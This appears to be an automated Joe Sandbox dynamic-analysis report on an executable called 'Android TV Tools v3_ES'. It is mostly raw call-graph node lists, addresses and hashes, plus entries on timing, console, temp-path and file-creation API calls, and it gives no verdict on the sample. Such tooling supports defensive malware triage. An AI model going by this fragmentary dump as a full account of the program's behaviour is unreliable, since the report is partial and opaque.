7946->7939 7951 40c220 7947->7951 7948 407c2d 6 API calls 7948->7951 7949 407c2d 6 API calls 7950 40c4d5 7949->7950 7950->7949 7953 40c520 7950->7953 7951->7948 7951->7950 7954 40c4cd 7951->7954 7952 407c2d 6 API calls 7952->7953 7953->7952 7953->7954 7954->7943 7513 40cfc9 7514 40cfe2 7513->7514 7515 40cfda 7513->7515 7517 40cff4 7514->7517 7518 40cff1 CloseHandle 7514->7518 7515->7514 7516 40cfdf CloseHandle 7515->7516 7516->7514 7518->7517 7955 403909 7956 403968 7955->7956 7957 405edf 26 API calls 7956->7957 7958 403990 7957->7958 7959 405882 13 API calls 7958->7959 7962 403a0e 7958->7962 7960 4039c1 7959->7960 7961 4055a9 52 API calls 7960->7961 7961->7962 7519 404acc 7520 404ad5 7519->7520 7521 404c49 7520->7521 7522 404aec 7520->7522 7567 404cea SetConsoleTextAttribute 7521->7567 7559 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7522->7559 7525 404b02 7560 404cea SetConsoleTextAttribute 7525->7560 7526 404c56 7568 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7526->7568 7529 404c74 7530 405e8e 13 API calls 7529->7530 7531 404c81 7530->7531 7569 404cea SetConsoleTextAttribute 7531->7569 7533 404b12 7536 405e8e 13 API calls 7533->7536 7534 404c91 7570 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7534->7570 7538 404b3b 7536->7538 7537 404ca3 7561 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7538->7561 7540 404b56 7562 404cea SetConsoleTextAttribute 7540->7562 7542 404b66 7543 405e8e 13 API calls 7542->7543 7544 404b8f 7543->7544 7545 404d05 3 API calls 7544->7545 7546 404b9b 7545->7546 7563 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7546->7563 7548 404bb4 7564 404cea SetConsoleTextAttribute 7548->7564 7550 404bc4 7551 405e8e 13 API calls 7550->7551 7552 404bed 7551->7552 7565 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7552->7565 7554 404c08 7566 404cea SetConsoleTextAttribute 7554->7566 7556 404c18 7557 405e8e 13 API calls 7556->7557 7558 404c41 7557->7558 7559->7525 7560->7533 7561->7540 7562->7542 7563->7548 7564->7550 7565->7554 7566->7556 7567->7526 7568->7529 7569->7534 7570->7537 7963 40ba16 7964 40ba24 7963->7964 7965 40ba55 7964->7965 7966 40ba28 MultiByteToWideChar 7964->7966 7966->7965 7967 40ba3f CompareStringW 7966->7967 7967->7965 7968 402897 7969 4028a6 7968->7969 7970 402b3d 7969->7970 7973 4059ed 12 API calls 7969->7973 7975 4028e2 7969->7975 7971 405882 13 API calls 7970->7971 7972 402b4e 7971->7972 7974 4055a9 52 API calls 7972->7974 7973->7975 7988 402b5b 7974->7988 7976 4058d8 12 API calls 7975->7976 7978 402964 7975->7978 7976->7978 7977 402fb6 7981 405882 13 API calls 7977->7981 7978->7970 8030 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7978->8030 7980 402a08 7982 405e8e 13 API calls 7980->7982 7983 402fca 7981->7983 7984 402a15 7982->7984 8031 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7984->8031 7986 402d93 7986->7977 7994 40563f 13 API calls 7986->7994 7987 402a72 7989 405e8e 13 API calls 7987->7989 7988->7986 7990 40563f 13 API calls 7988->7990 7991 402a7f 7989->7991 7993 402bdc 7990->7993 7992 4035ee 13 API calls 7991->7992 7995 402aa9 7992->7995 7996 4055a9 52 API calls 7993->7996 7997 402e14 7994->7997 7998 405e8e 13 API calls 7995->7998 7999 402beb 7996->7999 8000 4055a9 52 API calls 7997->8000 8001 402ab2 7998->8001 8005 405edf 26 API calls 7999->8005 8002 402e23 8000->8002 8003 405e8e 13 API calls 8001->8003 8006 405edf 26 API calls 8002->8006 8004 402abf 8003->8004 8032 404caa SetConsoleCursorPosition SetConsoleCursorInfo 8004->8032 8008 402c20 8005->8008 8009 402e58 8006->8009 8008->7986 8012 40583f 12 API calls 8008->8012 8009->7977 8014 402faa 8009->8014 8015 402eae 8009->8015 8010 402ad3 8011 405e8e 13 API calls 8010->8011 8021 402ae0 8011->8021 8013 402c47 8012->8013 8017 402d87 8013->8017 8018 402c8a 8013->8018 8016 405882 13 API calls 8014->8016 8019 4059ed 12 API calls 8015->8019 8024 402ecf 8015->8024 8016->7977 8020 405882 13 API calls 8017->8020 8022 4059ed 12 API calls 8018->8022 8026 402cab 8018->8026 8019->8024 8020->7986 8021->7970 8023 405e8e 13 API calls 8021->8023 8022->8026 8023->8021 8025 402f52 8024->8025 8028 4058d8 12 API calls 8024->8028 8027 402d2e 8026->8027 8029 4058d8 12 API calls 8026->8029 8028->8025 8029->8027 8030->7980 8031->7987 8032->8010 7571 40b258 7572 406523 7 API calls 7571->7572 7573 40b25f 7572->7573 8033 406518 8034 405dca 3 API calls 8033->8034 8035 406523 8034->8035 8036 406531 8035->8036 8037 408b48 7 API calls 8035->8037 8038 408b81 7 API calls 8036->8038 8037->8036 8039 40653a 8038->8039 7574 402c60 7575 402c6f 7574->7575 7576 402d87 7575->7576 7577 402c8a 7575->7577 7578 405882 13 API calls 7576->7578 7579 4059ed 12 API calls 7577->7579 7580 402cab 7577->7580 7586 402d93 7578->7586 7579->7580 7582 402d2e 7580->7582 7583 4058d8 12 API calls 7580->7583 7581 402fb6 7584 405882 13 API calls 7581->7584 7583->7582 7585 402fca 7584->7585 7586->7581 7587 40563f 13 API calls 7586->7587 7588 402e14 7587->7588 7589 4055a9 52 API calls 7588->7589 7590 402e23 7589->7590 7591 405edf 26 API calls 7590->7591 7592 402e58 7591->7592 7592->7581 7593 402faa 7592->7593 7594 402eae 7592->7594 7595 405882 13 API calls 7593->7595 7596 4059ed 12 API calls 7594->7596 7597 402ecf 7594->7597 7595->7581 7596->7597 7598 402f52 7597->7598 7599 4058d8 12 API calls 7597->7599 7599->7598 8040 407a23 8046 4074ac 8040->8046 8042 407a36 8043 407a28 8043->8042 8044 405882 13 API calls 8043->8044 8045 407308 4 API calls 8043->8045 8044->8043 8045->8043 8049 4074b5 8046->8049 8050 4074b3 8049->8050 8051 4074c6 8049->8051 8050->8043 8051->8050 8052 407415 8 API calls 8051->8052 8052->8051 7600 4032e4 7601 4032f3 7600->7601 7602 405b1d 6 API calls 7601->7602 7604 40330e 7601->7604 7603 40354b 7602->7603 7605 4044e6 7607 40451c GetStdHandle 7605->7607 7608 40455c 7607->7608 7609 404633 7608->7609 7687 404cea SetConsoleTextAttribute 7608->7687 7610 404750 7609->7610 7690 404cea SetConsoleTextAttribute 7609->7690 7612 4048d9 7610->7612 7693 404cea SetConsoleTextAttribute 7610->7693 7616 404a0f 7612->7616 7697 404cea SetConsoleTextAttribute 7612->7697 7614 404578 7688 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7614->7688 7618 40464f 7691 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7618->7691 7619 40458e 7628 405e8e 13 API calls 7619->7628 7621 40476c 7694 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7621->7694 7623 4048f5 7698 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7623->7698 7625 404665 7631 405e8e 13 API calls 7625->7631 7627 404782 7632 405e8e 13 API calls 7627->7632 7630 4045b1 7628->7630 7629 40490b 7634 405e8e 13 API calls 7629->7634 7636 405e8e 13 API calls 7630->7636 7633 404688 7631->7633 7635 4047a5 7632->7635 7638 405e8e 13 API calls 7633->7638 7637 40492e 7634->7637 7640 405e8e 13 API calls 7635->7640 7639 4045d4 7636->7639 7645 405e8e 13 API calls 7637->7645 7641 4046ab 7638->7641 7689 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7639->7689 7643 4047c8 7640->7643 7647 405e8e 13 API calls 7641->7647 7649 405e8e 13 API calls 7643->7649 7644 4045ed 7651 405e8e 13 API calls 7644->7651 7646 404951 7645->7646 7699 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7646->7699 7650 4046ce 7647->7650 7653 4047eb 7649->7653 7692 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7650->7692 7655 404610 7651->7655 7652 40496a 7658 405e8e 13 API calls 7652->7658 7695 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7653->7695 7660 405e8e 13 API calls 7655->7660 7657 4046e7 7662 405e8e 13 API calls 7657->7662 7661 40498d 7658->7661 7659 404804 7663 405e8e 13 API calls 7659->7663 7660->7609 7665 405e8e 13 API calls 7661->7665 7664 40470a 7662->7664 7666 404827 7663->7666 7671 405e8e 13 API calls 7664->7671 7667 4049b0 7665->7667 7668 405e8e 13 API calls 7666->7668 7700 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7667->7700 7670 404834 7668->7670 7674 405e8e 13 API calls 7670->7674 7673 40472d 7671->7673 7672 4049c9 7677 405e8e 13 API calls 7672->7677 7676 405e8e 13 API calls 7673->7676 7675 404857 7674->7675 7696 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7675->7696 7676->7610 7679 4049ec 7677->7679 7681 405e8e 13 API calls 7679->7681 7680 404870 7682 405e8e 13 API calls 7680->7682 7681->7616 7683 404893 7682->7683 7684 405e8e 13 API calls 7683->7684 7685 4048b6 7684->7685 7686 405e8e 13 API calls 7685->7686 7686->7612 7687->7614 7688->7619 7689->7644 7690->7618 7691->7625 7692->7657 7693->7621 7694->7627 7695->7659 7696->7680 7697->7623 7698->7629 7699->7652 7700->7672 8053 40b9a7 8054 40b9b9 8053->8054 8055 40b9c2 MultiByteToWideChar 8054->8055 8056 40ba55 8054->8056 8055->8056 8057 40b9dc MultiByteToWideChar 8055->8057 8057->8056 8058 40b9f4 8057->8058 8058->8056 8059 40ba28 MultiByteToWideChar 8058->8059 8059->8056 8060 40ba3f CompareStringW 8059->8060 8060->8056 7701 408a68 7704 408a70 7701->7704 7702 408b02 7704->7702 7705 408978 RtlUnwind 7704->7705 7706 408990 7705->7706 7706->7704 7707 40bfe8 7708 40bff6 7707->7708 7709 40bffa LCMapStringW 7708->7709 7710 40bfae 7708->7710 7709->7710 7711 40c012 WideCharToMultiByte 7709->7711 7711->7710 7713 402469 7714 402478 7713->7714 7716 405d00 6 API calls 7714->7716 7732 402fb6 7714->7732 7715 405882 13 API calls 7717 402fca 7715->7717 7718 4024b9 7716->7718 7719 405ac6 12 API calls 7718->7719 7720 4024d1 7719->7720 7721 4032a3 6 API calls 7720->7721 7722 4024f0 7721->7722 7723 405ac6 12 API calls 7722->7723 7724 40250e 7723->7724 7725 4032a3 6 API calls 7724->7725 7726 40252d 7725->7726 7727 4059ed 12 API calls 7726->7727 7728 402557 7726->7728 7727->7728 7729 405d00 6 API calls 7728->7729 7730 40260e 7729->7730 7731 405ac6 12 API calls 7730->7731 7733 40262e 7731->7733 7732->7715 7733->7732 7739 4027ce 7733->7739 7742 402b5b 7733->7742 7825 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7733->7825 7735 4026ea 7736 405e8e 13 API calls 7735->7736 7737 4026f7 7736->7737 7738 405e8e 13 API calls 7737->7738 7740 402706 7738->7740 7744 40563f 13 API calls 7739->7744 7741 4035ee 13 API calls 7740->7741 7743 40272c 7741->7743 7746 402d93 7742->7746 7749 40563f 13 API calls 7742->7749 7745 405e8e 13 API calls 7743->7745 7747 402826 7744->7747 7748 402735 7745->7748 7746->7732 7755 40563f 13 API calls 7746->7755 7750 4055a9 52 API calls 7747->7750 7751 405e8e 13 API calls 7748->7751 7752 402bdc 7749->7752 7753 402835 7750->7753 7754 402742 7751->7754 7756 4055a9 52 API calls 7752->7756 7762 405edf 26 API calls 7753->7762 7757 405e8e 13 API calls 7754->7757 7758 402e14 7755->7758 7759 402beb 7756->7759 7760 40274f 7757->7760 7761 4055a9 52 API calls 7758->7761 7766 405edf 26 API calls 7759->7766 7763 4035ee 13 API calls 7760->7763 7764 402e23 7761->7764 7773 40286b 7762->7773 7765 402772 7763->7765 7768 405edf 26 API calls 7764->7768 7767 405e8e 13 API calls 7765->7767 7769 402c20 7766->7769 7770 40277b 7767->7770 7772 402e58 7768->7772 7769->7746 7777 40583f 12 API calls 7769->7777 7771 405e8e 13 API calls 7770->7771 7775 402788 7771->7775 7772->7732 7783 402faa 7772->7783 7784 402eae 7772->7784 7773->7742 7774 402b3d 7773->7774 7780 4059ed 12 API calls 7773->7780 7786 4028e2 7773->7786 7776 405882 13 API calls 7774->7776 7778 4035ee 13 API calls 7775->7778 7779 402b4e 7776->7779 7781 402c47 7777->7781 7782 4027ab 7778->7782 7785 4055a9 52 API calls 7779->7785 7780->7786 7789 402d87 7781->7789 7790 402c8a 7781->7790 7788 405e8e 13 API calls 7782->7788 7787 405882 13 API calls 7783->7787 7792 4059ed 12 API calls 7784->7792 7798 402ecf 7784->7798 7785->7742 7794 4058d8 12 API calls 7786->7794 7799 402964 7786->7799 7787->7732 7791 4027b4 7788->7791 7793 405882 13 API calls 7789->7793 7795 4059ed 12 API calls 7790->7795 7802 402cab 7790->7802 7796 405e8e 13 API calls 7791->7796 7792->7798 7793->7746 7794->7799 7795->7802 7797 4027c1 7796->7797 7800 405e8e 13 API calls 7797->7800 7801 402f52 7798->7801 7805 4058d8 12 API calls 7798->7805 7799->7774 7826 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7799->7826 7800->7739 7804 402d2e 7802->7804 7807 4058d8 12 API calls 7802->7807 7805->7801 7806 402a08 7808 405e8e 13 API calls 7806->7808 7807->7804 7809 402a15 7808->7809 7827 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7809->7827 7811 402a72 7812 405e8e 13 API calls 7811->7812 7813 402a7f 7812->7813 7814 4035ee 13 API calls 7813->7814 7815 402aa9 7814->7815 7816 405e8e 13 API calls 7815->7816 7817 402ab2 7816->7817 7818 405e8e 13 API calls 7817->7818 7819 402abf 7818->7819 7828 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7819->7828 7821 402ad3 7822 405e8e 13 API calls 7821->7822 7823 402ae0 7822->7823 7823->7774 7824 405e8e 13 API calls 7823->7824 7824->7823 7825->7735 7826->7806 7827->7811 7828->7821 7829 408a70 7830 408b02 7829->7830 7832 408a8e 7829->7832 7831 408978 RtlUnwind 7831->7832 7832->7830 7832->7831 7833 405ef2 7834 405ef7 7833->7834 7837 407f1c GetModuleHandleA 7834->7837 7836 405efc 7838 407f3b 7837->7838 7839 407f2b GetProcAddress 7837->7839 7838->7836 7838->7838 7839->7838 7840 403ff3 7841 403ffc 7840->7841 7842 40441e 7841->7842 7843 4055a9 52 API calls 7841->7843 7844 4055a9 52 API calls 7842->7844 7846 404012 7843->7846 7845 404478 7844->7845 7847 4044cd 7845->7847 7848 404a16 19 API calls 7845->7848 7894 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7846->7894 7901 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7847->7901 7850 404492 7848->7850 7853 404d05 3 API calls 7850->7853 7852 4044de 7855 40449f 7853->7855 7854 40407d 7858 405e8e 13 API calls 7854->7858 7856 4055a9 52 API calls 7855->7856 7857 4044ae 7856->7857 7900 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7857->7900 7859 40409b 7858->7859 7895 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7859->7895 7862 4044c3 7864 405db9 3 API calls 7862->7864 7863 4040c1 7865 405e8e 13 API calls 7863->7865 7864->7847 7871 4040df 7865->7871 7866 4041a1 7896 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7866->7896 7868 4041c2 7869 405e8e 13 API calls 7868->7869 7870 4041e0 7869->7870 7897 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7870->7897 7871->7866 7872 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7871->7872 7876 405e8e 13 API calls 7871->7876 7872->7871 7874 40420b 7875 405e8e 13 API calls 7874->7875 7887 404229 7875->7887 7876->7871 7877 4042e9 7898 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7877->7898 7879 4042fb 7880 405e8e 13 API calls 7879->7880 7881 40430a 7880->7881 7899 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7881->7899 7883 405e8e 13 API calls 7883->7887 7884 40431f 7885 405e8e 13 API calls 7884->7885 7893 40432c 7885->7893 7886 404caa SetConsoleCursorPosition SetConsoleCursorInfo 7886->7887 7887->7877 7887->7883 7887->7886 7888 404412 7889 403849 13 API calls 7888->7889 7889->7842 7890 40cdfa 5 API calls 7890->7893 7891 40cdb6 WriteConsoleA CreateFileA 7891->7893 7892 405e8e 13 API calls 7892->7893 7893->7888 7893->7890 7893->7891 7893->7892 7894->7854 7895->7863 7896->7868 7897->7874 7898->7879 7899->7884 7900->7862 7901->7852 8061 40bf34 8062 40bf43 8061->8062 8063 40bf48 MultiByteToWideChar 8062->8063 8064 40bfae 8062->8064 8063->8064 8065 40bf61 LCMapStringW 8063->8065 8065->8064 8066 40bf7c 8065->8066 8067 40bf82 8066->8067 8069 40bfc2 8066->8069 8067->8064 8068 40bf90 LCMapStringW 8067->8068 8068->8064 8069->8064 8070 40bffa LCMapStringW 8069->8070 8070->8064 8071 40c012 WideCharToMultiByte 8070->8071 8071->8064 7902 401bfa 7903 401c09 7902->7903 7904 40563f 13 API calls 7903->7904 7905 401e35 7904->7905 7906 401ef5 93 API calls 7905->7906 7907 401e3d 7906->7907 7908 4055a9 52 API calls 7907->7908 7909 401e47 7908->7909 7911 4055a9 52 API calls 7909->7911 7913 401ea0 7909->7913 7910 401eeb 7911->7909 7912 4055a9 52 API calls 7912->7913 7913->7910 7913->7912 7914 40797e 7915 40798b 7914->7915 7916 40a56e 6 API calls 7915->7916 7917 4079a5 7916->7917 7918 40a56e 6 API calls 7917->7918 7921 4079d0 7917->7921 7919 4079be 7918->7919 7920 406523 7 API calls 7919->7920 7919->7921 7920->7921

                        Executed Functions

                        Function 00404D37 Relevance: 5.2, APIs: 3, Instructions: 661timesleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1070 404d37-40553e call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 timeGetTime call 40638e 1377 405540 1070->1377 1378 405547-40555b 1070->1378 1377->1378 1379 40555e-40556f call 406398 1378->1379 1382 405571-4055a8 Sleep timeGetTime call 40638e 1379->1382 1383 40558d 1379->1383 1383->1379
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Timetime$Sleep
                        • String ID:
                        • API String ID: 4176159691-0
                        • Opcode ID: 34695182426c4961b278ce684a6b6519380ca38d5c9cabf86c5f4d6901f888cf
                        • Instruction ID: b751e6467f139353cb55b9ffbe826672e87d8d943d97ab80e4bb7b2c357d5605
                        • Opcode Fuzzy Hash: 34695182426c4961b278ce684a6b6519380ca38d5c9cabf86c5f4d6901f888cf
                        • Instruction Fuzzy Hash: E3120FE7C4020476F7106AA17C4BF9B752C5B2131EF48097EB90D751C3F97AA3684AAB
                        Function 004036D1 Relevance: 4.5, APIs: 3, Instructions: 42timesleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1396 4036d1-4036f8 timeGetTime call 40638e 1399 403701-403715 1396->1399 1400 4036fa 1396->1400 1401 403718-403729 call 406398 1399->1401 1400->1399 1404 403747 1401->1404 1405 40372b-403761 Sleep timeGetTime call 40638e 1401->1405 1404->1401
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Timetime$Sleep
                        • String ID:
                        • API String ID: 4176159691-0
                        • Opcode ID: cc85ca76a26f2f31c0325530f9469c6ef665bb5aae36b1bad800a382faa1d765
                        • Instruction ID: eae6611afc9ea53c4c174798e7303799e140014dd54562b74f488a96469025fd
                        • Opcode Fuzzy Hash: cc85ca76a26f2f31c0325530f9469c6ef665bb5aae36b1bad800a382faa1d765
                        • Instruction Fuzzy Hash: FC01EDB1C00208EBDB04DF94C94579D7FB4EF0030DF20C0A9E90A6B241D735AB959B99
                        Function 00406444 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 0040646A
                          • Part of subcall function 0040893C: HeapCreate.KERNELBASE(00000000,00001000,00000000,004064A2,00000000), ref: 0040894D
                          • Part of subcall function 0040893C: HeapDestroy.KERNEL32 ref: 0040896B
                        • GetCommandLineA.KERNEL32 ref: 004064B8
                          • Part of subcall function 00406548: ExitProcess.KERNEL32 ref: 00406565
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                        • String ID:
                        • API String ID: 1387771204-0
                        • Opcode ID: 8f64078e7c1048c80ea45f85acce868f71707771f6b24207ebeb838d2c4f3778
                        • Instruction ID: 011fcb3a6802012f724db4fd9d8ba721985a1d622206a0a919988acb22e904e2
                        • Opcode Fuzzy Hash: 8f64078e7c1048c80ea45f85acce868f71707771f6b24207ebeb838d2c4f3778
                        • Instruction Fuzzy Hash: FE11A2B1D00B01EFD708AF66DD06BB93B64EB84308F10803FF505A62E1DA7849008F6D
                        Function 00401000 Relevance: 60.5, APIs: 3, Strings: 31, Instructions: 1032COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 401000-401263 call 405810 call 404d37 GetStdHandle GetModuleFileNameA call 405790 7 401274-40127b 0->7 8 4012c7-4013d3 call 4056a0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 7->8 9 40127d-40129f call 403635 call 4035d1 7->9 63 4013e4-4013eb 8->63 19 4012a1-4012c3 call 403762 call 4056a0 9->19 20 4012c5 9->20 19->8 20->7 64 40141b-401be8 call 4056a0 * 2 GetTempPathA call 403762 call 4056a0 call 403575 * 7 call 40563f call 4056a0 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 call 4055a9 call 403575 * 4 call 40563f call 4056a0 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 * 2 call 403575 call 4056b0 call 4055a9 call 40563f call 4055a9 call 403217 call 40563f call 4056a0 * 2 call 403217 call 40563f * 2 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 40563f * 2 call 403575 call 4056a0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 403575 call 4056b0 call 4056a0 call 403575 * 8 call 40563f call 403575 * 4 call 40563f call 403575 * 3 call 40563f 63->64 65 4013ed-401419 call 403635 call 4035d1 63->65 341 401d70-401e42 call 403575 * 12 call 40563f call 401ef5 call 4055a9 64->341 342 401bee-401c15 64->342 65->63 414 401e47-401e56 341->414 346 401c1b-401c2f 342->346 347 401d4c-401d6d call 4056b0 * 2 342->347 349 401c40-401c5e call 405790 346->349 347->341 358 401c60-401c94 call 403635 call 4035d1 349->358 359 401ca2-401ca9 349->359 386 401ca0 358->386 387 401c96 358->387 361 401d12-401d19 359->361 362 401cab-401cb2 359->362 365 401d1b-401d2a call 4056b0 361->365 366 401d2d-401d44 call 4056b0 361->366 367 401cb4-401cc3 call 4056b0 362->367 368 401cc6-401d10 call 403575 call 4056b0 * 2 call 403575 call 4056b0 362->368 365->366 383 401d47 366->383 367->368 368->383 383->347 386->349 387->386 415 401ea0-401eaf 414->415 416 401e58-401e62 414->416 417 401ec0-401ecc 415->417 418 401e73-401e82 416->418 420 401eeb-401ef4 417->420 421 401ece-401ee9 call 4055a9 417->421 418->415 419 401e84-401e9e call 4055a9 418->419 419->418 421->417
                        APIs
                        • GetStdHandle.KERNEL32(000000F5), ref: 00401223
                        • GetModuleFileNameA.KERNEL32(00000000,00413298,00000104), ref: 0040123A
                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 00401455
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
